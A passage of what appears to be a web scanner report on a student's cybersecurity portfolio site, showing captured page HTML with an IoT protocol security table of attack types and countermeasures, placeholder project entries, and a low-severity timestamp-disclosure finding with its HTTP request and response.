          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          080804898
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        3. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          083845791, which evaluates to: 1972-08-28 11:29:51

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
